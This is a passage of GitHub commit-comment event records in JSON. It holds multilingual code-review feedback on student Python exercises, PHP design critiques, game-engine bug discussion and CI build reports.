{"id":"8033498285","type":"CommitCommentEvent","actor":{"login":"kinjo-icolle"},"repo":{"name":"n18018/programming-term2"},"payload":{"comment":{"id":29872969,"position":null,"line":null,"path":null,"commit_id":"dffeb6812828281594d8b2ff7cce72ec64e9ab0c","created_at":"2018-07-29T06:53:46Z","updated_at":"2018-07-29T06:53:46Z","author_association":"NONE","body":"7/18課題ですが、色々惜しい…もうちょっとのところまで行ってるだけに勿体無いです。\r\n\r\nまずメインメニューの金額がどこにも格納されていないです。\r\n変数sum_vに格納する狙いであれば、「メインメニューを承りました。」のメッセージの直前で\r\nsum_v += main[order_1]\r\nと代入すべきですね。+=で「現状格納されている値に加算する」という演算をしています。\r\n\r\nまた、上記sum_vに関する箇所で、42行目にて\r\nsum_v = order_2\r\nとしていますが、こうすると「オプションの商品名」が代入されてしまいますので、\r\nsum_v = op[order_2]が正しいです。\r\n\r\nあと、41行目の\r\na_order = order_2\r\nですが、これだと、複数回オプションを選んだ内、一番最後のオプションのみがa_orderに入ってしまい、\r\n順番に追加する動きになりません。\r\n正解は\r\na_order.append(order_2)\r\nとなります。リストに.append()で要素を「追加」できます。\r\n\r\nあと、47,48行目ですが、文法エラーになっていると思います。\r\n複数の引数を指定(この場合はメッセージを表示)する際にはカンマで区切りましょう。"}},"created_at":"2018-07-29T06:53:46Z"}
{"id":"8033498963","type":"CommitCommentEvent","actor":{"login":"KRodinn"},"repo":{"name":"KRodinn/OGSR-Engine"},"payload":{"comment":{"id":29872973,"position":null,"line":null,"path":null,"commit_id":"c2eed60e09b1619232cee43b6b16a687809b66f6","created_at":"2018-07-29T06:54:24Z","updated_at":"2018-07-29T06:54:24Z","author_association":"OWNER","body":"Ну значит, оно или исправляет что-то другое, или не работает."}},"created_at":"2018-07-29T06:54:24Z"}
{"id":"8033499548","type":"CommitCommentEvent","actor":{"login":"omeisi"},"repo":{"name":"omeisi/emails_project"},"payload":{"comment":{"id":29872974,"position":5,"line":7,"path":"package.json","commit_id":"71a9d0abe3453b4b972bfd1dbfe25d648a30340a","created_at":"2018-07-29T06:54:55Z","updated_at":"2018-07-29T06:54:55Z","author_association":"OWNER","body":"use this node version\r\n"}},"created_at":"2018-07-29T06:54:55Z"}
{"id":"8033499967","type":"CommitCommentEvent","actor":{"login":"omeisi"},"repo":{"name":"omeisi/emails_project"},"payload":{"comment":{"id":29872975,"position":6,"line":8,"path":"package.json","commit_id":"71a9d0abe3453b4b972bfd1dbfe25d648a30340a","created_at":"2018-07-29T06:55:19Z","updated_at":"2018-07-29T06:55:19Z","author_association":"OWNER","body":"use this npm version"}},"created_at":"2018-07-29T06:55:19Z"}
{"id":"8033500075","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"drewyh/EnergyPlus"},"payload":{"comment":{"id":29872976,"position":null,"line":null,"path":null,"commit_id":"b46db8d3ea2a72281a516814ec9bd4f7397ce700","created_at":"2018-07-29T06:55:24Z","updated_at":"2018-07-29T06:55:24Z","author_association":"NONE","body":"oo_boiler_refactor (drewyh) - x86_64-Linux-Ubuntu-14.04-gcc-4.8-UnitTestsCoverage-Debug: OK (1687 of 1687 tests passed, 0 test warnings)\n\n\n\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-b46db8d3ea2a72281a516814ec9bd4f7397ce700-PR6728-x86_64-Linux-Ubuntu-14.04-gcc-4.8-UnitTestsCoverage-Debug.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.png)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-b46db8d3ea2a72281a516814ec9bd4f7397ce700-PR6728-x86_64-Linux-Ubuntu-14.04-gcc-4.8-UnitTestsCoverage-Debug.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-100.0%25-green.png)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-b46db8d3ea2a72281a516814ec9bd4f7397ce700-PR6728-x86_64-Linux-Ubuntu-14.04-gcc-4.8-UnitTestsCoverage-Debug.html'>![Coverage Badge](http://img.shields.io/badge/coverage%20status-40.01%25-green.png)</a>\n"}},"created_at":"2018-07-29T06:55:24Z"}
{"id":"8033500511","type":"CommitCommentEvent","actor":{"login":"omeisi"},"repo":{"name":"omeisi/emails_project"},"payload":{"comment":{"id":29872977,"position":10,"line":11,"path":"package.json","commit_id":"71a9d0abe3453b4b972bfd1dbfe25d648a30340a","created_at":"2018-07-29T06:55:51Z","updated_at":"2018-07-29T06:55:51Z","author_association":"OWNER","body":"this is how you are going to start the app "}},"created_at":"2018-07-29T06:55:51Z"}
{"id":"8033502147","type":"CommitCommentEvent","actor":{"login":"omeisi"},"repo":{"name":"omeisi/emails_project"},"payload":{"comment":{"id":29872981,"position":1,"line":1,"path":"index.js","commit_id":"71a9d0abe3453b4b972bfd1dbfe25d648a30340a","created_at":"2018-07-29T06:57:31Z","updated_at":"2018-07-29T06:57:31Z","author_association":"OWNER","body":"const express = require('express');\r\n const app = express();\r\n app.get('route', (request, respond) => {\r\n  respond.send({ name: 'aviad', familyname: 'omeisi'});\r\n});\r\n const PORT = process.env.PORT || 5000; \r\napp.listen(PORT);"}},"created_at":"2018-07-29T06:57:31Z"}
{"id":"8033506979","type":"CommitCommentEvent","actor":{"login":"locutus2"},"repo":{"name":"31m059/Stockfish"},"payload":{"comment":{"id":29873009,"position":null,"line":null,"path":null,"commit_id":"74cb52ff68482149247dbc3eb995f8b31130a0e3","created_at":"2018-07-29T07:01:49Z","updated_at":"2018-07-29T07:01:49Z","author_association":"NONE","body":"volatile in the sense that probably at next move the pawn captures the piece because of material gain (block removed) or the piece retreats next move to avoid material loss (block remains, seems the more probable case). But its probably better for search to find this out."}},"created_at":"2018-07-29T07:01:49Z"}
{"id":"8033509428","type":"CommitCommentEvent","actor":{"login":"VladFiliucov"},"repo":{"name":"Lisss13/courses"},"payload":{"comment":{"id":29873017,"position":6,"line":6,"path":"2/second.rb","commit_id":"7906135f25a0d9719f379e6392070d70aee7da94","created_at":"2018-07-29T07:04:01Z","updated_at":"2018-07-29T07:04:01Z","author_association":"NONE","body":"Да, это решает задачу. Можешь оставить так. В руби мы стараемся писать код \"для людей\", а не для машин. И руби дает нам эти возможности. Вот тут например можно написать так\r\n```\r\n(10..100).step(5).to_a\r\n```\r\nДай нам отрезок начиная с 10 до 100 с интервалом 5 в виде массива. Понятно намерение кода, и понятно какую он задачу решает."}},"created_at":"2018-07-29T07:04:01Z"}
{"id":"8033510288","type":"CommitCommentEvent","actor":{"login":"kinjo-icolle"},"repo":{"name":"n18022/programming-term2"},"payload":{"comment":{"id":29873021,"position":null,"line":null,"path":null,"commit_id":"b4feb87257461b1ab2e39b02f7adab37fdebab5a","created_at":"2018-07-29T07:04:51Z","updated_at":"2018-07-29T07:04:51Z","author_association":"NONE","body":"確認しました。動作面は問題ないですね。\r\nコードの部分で気になった箇所を。\r\n\r\nsum_price(3行目にて定義)\r\nこれ、後続で代入する部分で金額を代入及び加算していっているので、初期化の時点では0を代入すべきと思います。\r\n結果として数値が入っているので問題ないですが、初期状態と後続でデータ型が異なってるのが気になりました。\r\n\r\nあと、オプション部分について、1回目かそれ以外かですが、相反する条件なので、僕なら52行目のifの代わりにelseを書きます。(49行目の条件に対するelse句)\r\n\r\nあとは58行目以降の「正しいオプションが入力されたかのチェック」ですが、38行目のメインメニューの選択と同様のコードで、\r\nif get_option_menue in optionmenues:\r\nとすればもっと簡潔に書けると思います。"}},"created_at":"2018-07-29T07:04:51Z"}
{"id":"8033511144","type":"CommitCommentEvent","actor":{"login":"VladFiliucov"},"repo":{"name":"Lisss13/courses"},"payload":{"comment":{"id":29873022,"position":26,"line":26,"path":"2/sixth.rb","commit_id":"7906135f25a0d9719f379e6392070d70aee7da94","created_at":"2018-07-29T07:05:41Z","updated_at":"2018-07-29T07:05:41Z","author_association":"NONE","body":"Это хорошо, только переименуй key на title, а val на details например. И индентация"}},"created_at":"2018-07-29T07:05:41Z"}
{"id":"8033512733","type":"CommitCommentEvent","actor":{"login":"kinjo-icolle"},"repo":{"name":"s18001-ikeshiro/programming-term2"},"payload":{"comment":{"id":29873027,"position":null,"line":null,"path":null,"commit_id":"01dba79d5d23231b24d4db072d33039a70483010","created_at":"2018-07-29T07:07:07Z","updated_at":"2018-07-29T07:07:07Z","author_association":"NONE","body":"メインメニューを選択した際にその商品の値段が表示出来ていますね。\r\n最低限の部分OKです。\r\n\r\n後日僕のサンプルコードもpushしますので、違いを確認して、どう解決したかを参考にしてみてくださいね。"}},"created_at":"2018-07-29T07:07:07Z"}
{"id":"8033513113","type":"CommitCommentEvent","actor":{"login":"WaffleTraits"},"repo":{"name":"ImpactDevelopment/ClientAPI"},"payload":{"comment":{"id":29873029,"position":null,"line":null,"path":null,"commit_id":"5966ad7398d60d20709dfbdeaec06628d495c518","created_at":"2018-07-29T07:07:28Z","updated_at":"2018-07-29T07:07:28Z","author_association":"NONE","body":"That's a lotta damage"}},"created_at":"2018-07-29T07:07:28Z"}
{"id":"8033513552","type":"CommitCommentEvent","actor":{"login":"inevermind"},"repo":{"name":"inevermind/test_work"},"payload":{"comment":{"id":29873031,"position":4,"line":4,"path":"review/DataProvider.php","commit_id":"7440f107ed894933769a27bad6453463a012fb4d","created_at":"2018-07-29T07:07:54Z","updated_at":"2018-07-29T07:07:54Z","author_association":"OWNER","body":"Отсутствует doc-блок"}},"created_at":"2018-07-29T07:07:54Z"}
{"id":"8033513598","type":"CommitCommentEvent","actor":{"login":"joye-ramone"},"repo":{"name":"KRodinn/OGSR-Engine"},"payload":{"comment":{"id":29873032,"position":null,"line":null,"path":null,"commit_id":"c2eed60e09b1619232cee43b6b16a687809b66f6","created_at":"2018-07-29T07:07:56Z","updated_at":"2018-07-29T07:07:56Z","author_association":"CONTRIBUTOR","body":"Точно работало. У меня пистолеты постоянно так зависали, сделал фикс - перестал.\r\nА у тебя как проблема повторялась?"}},"created_at":"2018-07-29T07:07:56Z"}
{"id":"8033514124","type":"CommitCommentEvent","actor":{"login":"inevermind"},"repo":{"name":"inevermind/test_work"},"payload":{"comment":{"id":29873036,"position":7,"line":7,"path":"review/DataProvider.php","commit_id":"7440f107ed894933769a27bad6453463a012fb4d","created_at":"2018-07-29T07:08:29Z","updated_at":"2018-07-29T07:08:29Z","author_association":"OWNER","body":"Область видимости переменных должна быть protected в данном случае, нет необходимости закрывать их для наследников."}},"created_at":"2018-07-29T07:08:29Z"}
{"id":"8033514338","type":"CommitCommentEvent","actor":{"login":"VladFiliucov"},"repo":{"name":"Lisss13/courses"},"payload":{"comment":{"id":29873037,"position":10,"line":10,"path":"2/third.rb","commit_id":"7906135f25a0d9719f379e6392070d70aee7da94","created_at":"2018-07-29T07:08:43Z","updated_at":"2018-07-29T07:08:43Z","author_association":"NONE","body":"Зачем менять 2 внешних переменных, если можно 1? Лучше создать массив сразу с 2 значениями, и дальше сразу определить переменную next в которой будет следующее значение. Потом в цикле пушить элемент в массив и переопределять next"}},"created_at":"2018-07-29T07:08:43Z"}
{"id":"8033514406","type":"CommitCommentEvent","actor":{"login":"inevermind"},"repo":{"name":"inevermind/test_work"},"payload":{"comment":{"id":29873038,"position":12,"line":12,"path":"review/DataProvider.php","commit_id":"7440f107ed894933769a27bad6453463a012fb4d","created_at":"2018-07-29T07:08:47Z","updated_at":"2018-07-29T07:08:47Z","author_association":"OWNER","body":"В doc-блоке не заданы типы переменных"}},"created_at":"2018-07-29T07:08:47Z"}
{"id":"8033514981","type":"CommitCommentEvent","actor":{"login":"inevermind"},"repo":{"name":"inevermind/test_work"},"payload":{"comment":{"id":29873040,"position":16,"line":16,"path":"review/DataProvider.php","commit_id":"7440f107ed894933769a27bad6453463a012fb4d","created_at":"2018-07-29T07:09:20Z","updated_at":"2018-07-29T07:09:20Z","author_association":"OWNER","body":"В конструкторе не используется type hitting, а стоило бы (если у нас PHP 7.x)"}},"created_at":"2018-07-29T07:09:20Z"}
{"id":"8033515838","type":"CommitCommentEvent","actor":{"login":"Norgus"},"repo":{"name":"07th-mod/himatsubushi"},"payload":{"comment":{"id":29873043,"position":null,"line":null,"path":null,"commit_id":"39c40d41ccc838c570fd6b16a2c19ccee67b3a54","created_at":"2018-07-29T07:10:06Z","updated_at":"2018-07-29T07:10:06Z","author_association":"CONTRIBUTOR","body":"Thanks for the confirmation, it's reassuring to have your input!\n\nOn Sun, 29 Jul 2018, 03:28 Ítalo Bruno Andrade, <notifications@github.com>\nwrote:\n\n> I've been playing mahjong for over five years and I can confirm the\n> changes are on point, anything more would be nitpicking. Nice work.\n>\n> —\n> You are receiving this because you authored the thread.\n> Reply to this email directly, view it on GitHub\n> <https://github.com/07th-mod/himatsubushi/commit/39c40d41ccc838c570fd6b16a2c19ccee67b3a54#commitcomment-29871909>,\n> or mute the thread\n> <https://github.com/notifications/unsubscribe-auth/AAH7mOSDmGiIP-yRUNjCLCJXEGLKeTdXks5uLR2ygaJpZM4VlOZ3>\n> .\n>\n"}},"created_at":"2018-07-29T07:10:06Z"}
{"id":"8033516364","type":"CommitCommentEvent","actor":{"login":"inevermind"},"repo":{"name":"inevermind/test_work"},"payload":{"comment":{"id":29873044,"position":24,"line":24,"path":"review/DataProvider.php","commit_id":"7440f107ed894933769a27bad6453463a012fb4d","created_at":"2018-07-29T07:10:33Z","updated_at":"2018-07-29T07:10:33Z","author_association":"OWNER","body":"Отсутствует тип переменной в doc-блоке"}},"created_at":"2018-07-29T07:10:33Z"}
{"id":"8033517148","type":"CommitCommentEvent","actor":{"login":"UAEMano"},"repo":{"name":"UAEMano/test"},"payload":{"comment":{"id":29873046,"position":null,"line":null,"path":null,"commit_id":"0786e9935466b12996686ad379cd6520374f41e3","created_at":"2018-07-29T07:11:17Z","updated_at":"2018-07-29T07:11:17Z","author_association":"OWNER","body":"<!DOCTYPE html>\r\n<html lang=\"ja\">\r\n\t<head>\r\n\t\t<meta charset=\"UTF-8\">\r\n\t\t<title>hello</title>\r\n\t</head>\r\n\t<body>\r\n\t\tHello, world!\r\n\t</body>\r\n</html>"}},"created_at":"2018-07-29T07:11:17Z"}
{"id":"8033517629","type":"CommitCommentEvent","actor":{"login":"inevermind"},"repo":{"name":"inevermind/test_work"},"payload":{"comment":{"id":29873050,"position":28,"line":28,"path":"review/DataProvider.php","commit_id":"7440f107ed894933769a27bad6453463a012fb4d","created_at":"2018-07-29T07:11:46Z","updated_at":"2018-07-29T07:11:46Z","author_association":"OWNER","body":"Входной аргумент очевидно не список, а структура. В этом случае, используя для хранения структуры массив, мы размазываем ее \"кастомную реализацию\" через весь код, где она используется, соотв. во всех этих местах в дальнейшем ее будет необходимо поддерживать.\r\n\r\nБолее правильно было бы использовать для хранения структуры объект (dto или объект с логикой, при необходимости)."}},"created_at":"2018-07-29T07:11:46Z"}
{"id":"8033518198","type":"CommitCommentEvent","actor":{"login":"inevermind"},"repo":{"name":"inevermind/test_work"},"payload":{"comment":{"id":29873055,"position":10,"line":10,"path":"review/DecoratorManager.php","commit_id":"7440f107ed894933769a27bad6453463a012fb4d","created_at":"2018-07-29T07:12:17Z","updated_at":"2018-07-29T07:12:17Z","author_association":"OWNER","body":"Отсутствует doc-блок"}},"created_at":"2018-07-29T07:12:17Z"}
{"id":"8033518594","type":"CommitCommentEvent","actor":{"login":"kinjo-icolle"},"repo":{"name":"n18002/programming-term2"},"payload":{"comment":{"id":29873057,"position":null,"line":null,"path":null,"commit_id":"bb76d424a5094fe50ac1ca83d52ba605164a7283","created_at":"2018-07-29T07:12:38Z","updated_at":"2018-07-29T07:12:38Z","author_association":"NONE","body":"提出お疲れ様です。計算は出来ていますが、出題内容を満たし切れていないですね。\r\n詳細は下記です。\r\n\r\n・四則演算はそれぞれ関数として、add,sub,mul,divという名前で実装するという指示でした。\r\n・docstringがありません。\r\n・ヘルプが表示されていません。"}},"created_at":"2018-07-29T07:12:38Z"}
{"id":"8033518949","type":"CommitCommentEvent","actor":{"login":"PhantomGamers"},"repo":{"name":"PhantomGamers/metroskininstaller"},"payload":{"comment":{"id":29873060,"position":null,"line":null,"path":null,"commit_id":"5e094fb68248ee16b101d65e609fc4d208570991","created_at":"2018-07-29T07:12:59Z","updated_at":"2018-07-29T07:12:59Z","author_association":"OWNER","body":"Also of course I'm not gonna leave that as the default path, just did it while testing. I'll probably save it to the Metro skin directory, seems like the most sane choice?"}},"created_at":"2018-07-29T07:12:59Z"}
{"id":"8033519051","type":"CommitCommentEvent","actor":{"login":"KRodinn"},"repo":{"name":"KRodinn/OGSR-Engine"},"payload":{"comment":{"id":29873061,"position":null,"line":null,"path":null,"commit_id":"c2eed60e09b1619232cee43b6b16a687809b66f6","created_at":"2018-07-29T07:13:06Z","updated_at":"2018-07-29T07:13:06Z","author_association":"OWNER","body":"Берём калаш с подстволом, переключаемся в режим подствола. Стреляем, после этого бежим вперёд - спринтовая анимация не будет воспроизводиться, т.к. зависла айдловая анимация.\r\nИли бежим, прямо во время бега стреляем из подствола, останавливаемся - зависает анимация спринта.\r\nДа я вчера на НА6 проверял - проблема была.\r\nПосле этого фикса исправилась.\r\nЗначит надо ревертнуть эти костыли оттуда https://github.com/KRodinn/OGSR-Engine/commit/2b85edd9a3c1a92e8d368fd8c2f78f4e0f55a108#diff-d7125418e5c7539cc52926f3053b01c7\r\nОни теперь лишние."}},"created_at":"2018-07-29T07:13:06Z"}
{"id":"8033519162","type":"CommitCommentEvent","actor":{"login":"jacklit"},"repo":{"name":"jacklit/eshop"},"payload":{"comment":{"id":29873063,"position":null,"line":null,"path":null,"commit_id":"2b474b4323c342c2c6dde4c89506dd33aca7c801","created_at":"2018-07-29T07:13:11Z","updated_at":"2018-07-29T07:13:11Z","author_association":"OWNER","body":"n"}},"created_at":"2018-07-29T07:13:11Z"}
{"id":"8033519168","type":"CommitCommentEvent","actor":{"login":"inevermind"},"repo":{"name":"inevermind/test_work"},"payload":{"comment":{"id":29873064,"position":13,"line":13,"path":"review/DecoratorManager.php","commit_id":"7440f107ed894933769a27bad6453463a012fb4d","created_at":"2018-07-29T07:13:11Z","updated_at":"2018-07-29T07:13:11Z","author_association":"OWNER","body":"Публичная область видимости в данном случае избыточна и размазывает код по системе.\r\nНеобходимо установить область видимости в protected."}},"created_at":"2018-07-29T07:13:11Z"}
{"id":"8033519569","type":"CommitCommentEvent","actor":{"login":"inevermind"},"repo":{"name":"inevermind/test_work"},"payload":{"comment":{"id":29873065,"position":7,"line":7,"path":"review/DataProvider.php","commit_id":"7440f107ed894933769a27bad6453463a012fb4d","created_at":"2018-07-29T07:13:32Z","updated_at":"2018-07-29T07:13:32Z","author_association":"OWNER","body":"Отсутствует doc-блок над переменными"}},"created_at":"2018-07-29T07:13:32Z"}
{"id":"8033519677","type":"CommitCommentEvent","actor":{"login":"inevermind"},"repo":{"name":"inevermind/test_work"},"payload":{"comment":{"id":29873066,"position":13,"line":13,"path":"review/DecoratorManager.php","commit_id":"7440f107ed894933769a27bad6453463a012fb4d","created_at":"2018-07-29T07:13:39Z","updated_at":"2018-07-29T07:13:39Z","author_association":"OWNER","body":"Отсутствует doc-блок над переменными"}},"created_at":"2018-07-29T07:13:39Z"}
{"id":"8033521750","type":"CommitCommentEvent","actor":{"login":"kinjo-icolle"},"repo":{"name":"n18008/programming-term2"},"payload":{"comment":{"id":29873074,"position":null,"line":null,"path":null,"commit_id":"6fcb75d4fff5d9215492ae5eb559f27199d40535","created_at":"2018-07-29T07:15:26Z","updated_at":"2018-07-29T07:15:26Z","author_association":"NONE","body":"確認しました。計算OKです。docstringも記載されていますね。\r\nただ、ヘルプが表示されていません。"}},"created_at":"2018-07-29T07:15:26Z"}
{"id":"8033522359","type":"CommitCommentEvent","actor":{"login":"maoling"},"repo":{"name":"apache/zookeeper"},"payload":{"comment":{"id":29873077,"position":null,"line":null,"path":null,"commit_id":"a2623a625a4778720f7d5482d0a66e9b37ae556f","created_at":"2018-07-29T07:16:01Z","updated_at":"2018-07-29T07:16:01Z","author_association":"CONTRIBUTOR","body":"@nkalmar  Could you plz create a JIRA to document this metric `zk_fsync_threshold_exceed_count`  in the part of `mntr` of `zookeeperAdmin.html`"}},"created_at":"2018-07-29T07:16:01Z"}
{"id":"8033522694","type":"CommitCommentEvent","actor":{"login":"inevermind"},"repo":{"name":"inevermind/test_work"},"payload":{"comment":{"id":29873078,"position":22,"line":22,"path":"review/DecoratorManager.php","commit_id":"7440f107ed894933769a27bad6453463a012fb4d","created_at":"2018-07-29T07:16:17Z","updated_at":"2018-07-29T07:16:17Z","author_association":"OWNER","body":"Декоратор по паттерну не является \"наследником\" декорируемого класса. Да и просто логически это неверно.\r\nДекоратор должен на вход принимать собранный объект DataProvider'a и имплементацию интерфейса кеширующего слоя.\r\n\r\nТ.е. образом не должно быть наследования декоратора от DataProvider'a, а в конструкторе не должно быть переменных $host, $user, $password"}},"created_at":"2018-07-29T07:16:17Z"}
{"id":"8033523028","type":"CommitCommentEvent","actor":{"login":"inevermind"},"repo":{"name":"inevermind/test_work"},"payload":{"comment":{"id":29873082,"position":28,"line":28,"path":"review/DecoratorManager.php","commit_id":"7440f107ed894933769a27bad6453463a012fb4d","created_at":"2018-07-29T07:16:38Z","updated_at":"2018-07-29T07:16:38Z","author_association":"OWNER","body":"Отсутствует doc-блок"}},"created_at":"2018-07-29T07:16:38Z"}
{"id":"8033523144","type":"CommitCommentEvent","actor":{"login":"KRodinn"},"repo":{"name":"KRodinn/OGSR-Engine"},"payload":{"comment":{"id":29873083,"position":null,"line":null,"path":null,"commit_id":"c2eed60e09b1619232cee43b6b16a687809b66f6","created_at":"2018-07-29T07:16:44Z","updated_at":"2018-07-29T07:16:44Z","author_association":"OWNER","body":"Я щас их уберу тогда."}},"created_at":"2018-07-29T07:16:44Z"}
{"id":"8033523276","type":"CommitCommentEvent","actor":{"login":"JC1738"},"repo":{"name":"opentable/sous"},"payload":{"comment":{"id":29873084,"position":null,"line":null,"path":null,"commit_id":"9f541d7fe956554d34e0bba7d74abdef32027a76","created_at":"2018-07-29T07:16:52Z","updated_at":"2018-07-29T07:16:52Z","author_association":"MEMBER","body":"TeamCity Sous Support :: Sous Tests :: Smoke Tests Nightly (not exlude fail) [Build 54](https://teamcity.otenv.com/viewLog.html?buildId=9025410&buildTypeId=SousSupport_SousTests_SmokeTestsNightlyNotExludeFail) outcome was **SUCCESS**\nSummary: Tests passed: 48, ignored: 6 Build time: 00:16:49"}},"created_at":"2018-07-29T07:16:52Z"}
{"id":"8033523505","type":"CommitCommentEvent","actor":{"login":"inevermind"},"repo":{"name":"inevermind/test_work"},"payload":{"comment":{"id":29873086,"position":28,"line":28,"path":"review/DataProvider.php","commit_id":"7440f107ed894933769a27bad6453463a012fb4d","created_at":"2018-07-29T07:17:06Z","updated_at":"2018-07-29T07:17:06Z","author_association":"OWNER","body":"Отсутствует типизация возвращаемых аргументов (PHP 7.x)"}},"created_at":"2018-07-29T07:17:06Z"}
{"id":"8033523629","type":"CommitCommentEvent","actor":{"login":"inevermind"},"repo":{"name":"inevermind/test_work"},"payload":{"comment":{"id":29873089,"position":28,"line":28,"path":"review/DecoratorManager.php","commit_id":"7440f107ed894933769a27bad6453463a012fb4d","created_at":"2018-07-29T07:17:13Z","updated_at":"2018-07-29T07:17:13Z","author_association":"OWNER","body":"Отсутствует типизация возвращаемых аргументов (PHP 7.x)"}},"created_at":"2018-07-29T07:17:13Z"}
{"id":"8033523742","type":"CommitCommentEvent","actor":{"login":"inevermind"},"repo":{"name":"inevermind/test_work"},"payload":{"comment":{"id":29873090,"position":36,"line":36,"path":"review/DecoratorManager.php","commit_id":"7440f107ed894933769a27bad6453463a012fb4d","created_at":"2018-07-29T07:17:19Z","updated_at":"2018-07-29T07:17:19Z","author_association":"OWNER","body":"Отсутствует типизация возвращаемых аргументов (PHP 7.x)"}},"created_at":"2018-07-29T07:17:19Z"}
{"id":"8033524297","type":"CommitCommentEvent","actor":{"login":"inevermind"},"repo":{"name":"inevermind/test_work"},"payload":{"comment":{"id":29873094,"position":36,"line":36,"path":"review/DecoratorManager.php","commit_id":"7440f107ed894933769a27bad6453463a012fb4d","created_at":"2018-07-29T07:17:51Z","updated_at":"2018-07-29T07:17:51Z","author_association":"OWNER","body":"Входной аргумент очевидно не список, а структура. В этом случае, используя для хранения структуры массив, мы размазываем ее \"кастомную реализацию\" через весь код, где она используется, соотв. во всех этих местах в дальнейшем ее будет необходимо поддерживать.\r\n\r\nБолее правильно было бы использовать для хранения структуры объект (dto или объект с логикой, при необходимости)."}},"created_at":"2018-07-29T07:17:51Z"}
{"id":"8033524409","type":"CommitCommentEvent","actor":{"login":"jarthod"},"repo":{"name":"sriranggd/mongoid_rails_migrations"},"payload":{"comment":{"id":29873096,"position":6,"line":6,"path":"README.rdoc","commit_id":"668a82bb7c7a10a7e327900e8cfbe803b0059354","created_at":"2018-07-29T07:17:58Z","updated_at":"2018-07-29T07:17:58Z","author_association":"NONE","body":"Hello @sriranggd, I just took over the maintenance of the `mongoid_rails_migration` gem and released a `1.1.1` version with Rails 5 support. Feel free to go back to the original and remove your fork if you want ;)"}},"created_at":"2018-07-29T07:17:58Z"}
{"id":"8033524932","type":"CommitCommentEvent","actor":{"login":"inevermind"},"repo":{"name":"inevermind/test_work"},"payload":{"comment":{"id":29873097,"position":61,"line":61,"path":"review/DecoratorManager.php","commit_id":"7440f107ed894933769a27bad6453463a012fb4d","created_at":"2018-07-29T07:18:26Z","updated_at":"2018-07-29T07:18:26Z","author_association":"OWNER","body":"Входной аргумент очевидно не список, а структура. В этом случае, используя для хранения структуры массив, мы размазываем ее \"кастомную реализацию\" через весь код, где она используется, соотв. во всех этих местах в дальнейшем ее будет необходимо поддерживать.\r\n\r\nБолее правильно было бы использовать для хранения структуры объект (dto или объект с логикой, при необходимости)."}},"created_at":"2018-07-29T07:18:26Z"}
{"id":"8033525235","type":"CommitCommentEvent","actor":{"login":"LnL7"},"repo":{"name":"NixOS/nixpkgs"},"payload":{"comment":{"id":29873101,"position":null,"line":null,"path":null,"commit_id":"0eb13162f1873451a8269e7df1ef0c12c4379b16","created_at":"2018-07-29T07:18:45Z","updated_at":"2018-07-29T07:18:45Z","author_association":"CONTRIBUTOR","body":"Thanks."}},"created_at":"2018-07-29T07:18:45Z"}
{"id":"8033525241","type":"CommitCommentEvent","actor":{"login":"kinjo-icolle"},"repo":{"name":"n18010/programming-term2"},"payload":{"comment":{"id":29873102,"position":null,"line":null,"path":null,"commit_id":"8cd202a6794d25c96eafbacafee534ff35319498","created_at":"2018-07-29T07:18:45Z","updated_at":"2018-07-29T07:18:45Z","author_association":"NONE","body":"確認OKです。docstringの記載、ヘルプ表示とも問題なく、出題文のとおりですね。\r\nエラー処理をtry〜exceptで処理しているあたり流石です。"}},"created_at":"2018-07-29T07:18:45Z"}
{"id":"8033526542","type":"CommitCommentEvent","actor":{"login":"flipchan"},"repo":{"name":"flipchan/LayerProx"},"payload":{"comment":{"id":29873103,"position":null,"line":null,"path":null,"commit_id":"00a14e786d0b5fd2bcf460ecd3beae0470cbd82d","created_at":"2018-07-29T07:20:02Z","updated_at":"2018-07-29T07:20:02Z","author_association":"OWNER","body":"well this is a obfuscation proxy and the other one is a \"encode into base64 and tunnel the data \" application"}},"created_at":"2018-07-29T07:20:02Z"}
{"id":"8033527090","type":"CommitCommentEvent","actor":{"login":"inevermind"},"repo":{"name":"inevermind/test_work"},"payload":{"comment":{"id":29873105,"position":63,"line":63,"path":"review/DecoratorManager.php","commit_id":"7440f107ed894933769a27bad6453463a012fb4d","created_at":"2018-07-29T07:20:32Z","updated_at":"2018-07-29T07:20:32Z","author_association":"OWNER","body":"1. В строке json'a могут быть спец символы и экранирование, что не всегда подходит для использования в качестве значения для ключа.\r\n2. Использовать json как ключ не удобно с точки зрения эксплуатации - в случае отладки на бою, админы \"спасибо\" не скажут за такие ключи\r\n3. Доп. нагрузка на CPU для формирования ключа\r\n4. Размер ключа линейно зависит от размера данных\r\n\r\nВ общем, не надо так формировать ключ. Достаточно хеша фиксированной длины и небольшого тега, обозначающего тип кеша."}},"created_at":"2018-07-29T07:20:32Z"}
{"id":"8033527257","type":"CommitCommentEvent","actor":{"login":"inevermind"},"repo":{"name":"inevermind/test_work"},"payload":{"comment":{"id":29873108,"position":61,"line":61,"path":"review/DecoratorManager.php","commit_id":"7440f107ed894933769a27bad6453463a012fb4d","created_at":"2018-07-29T07:20:40Z","updated_at":"2018-07-29T07:20:40Z","author_association":"OWNER","body":"Отсутствует типизация возвращаемых аргументов (PHP 7.x)"}},"created_at":"2018-07-29T07:20:40Z"}
{"id":"8033541483","type":"CommitCommentEvent","actor":{"login":"jbeilstenedmands"},"repo":{"name":"dials/dials"},"payload":{"comment":{"id":29873160,"position":175,"line":205,"path":"util/export_mtz.py","commit_id":"33f6775cc3621ba066119c2e474c19fc4b93c01b","created_at":"2018-07-29T07:34:02Z","updated_at":"2018-07-29T07:34:02Z","author_association":"CONTRIBUTOR","body":"Hi David,\n\nThanks for pointing this out, I hadn't noticed this. I'll look at updating\nthis on 6th Aug when I'm back - I also still need to make a similar\nrefactor branch in xia2 before this work can be merged in.\n\nRegards,\nJames\n\n\nOn Fri, 27 Jul 2018, 10:07 David Waterman, <notifications@github.com> wrote:\n\n> I see that dials.symmetry imports this function, so it is currently\n> broken on this branch. A comment suggests this function should be moved\n> elsewhere:\n> https://github.com/dials/dials/blob/refactor-export-mtz/command_line/symmetry.py#L134\n>\n> —\n> You are receiving this because you authored the thread.\n> Reply to this email directly, view it on GitHub\n> <https://github.com/dials/dials/commit/33f6775cc3621ba066119c2e474c19fc4b93c01b#commitcomment-29855971>,\n> or mute the thread\n> 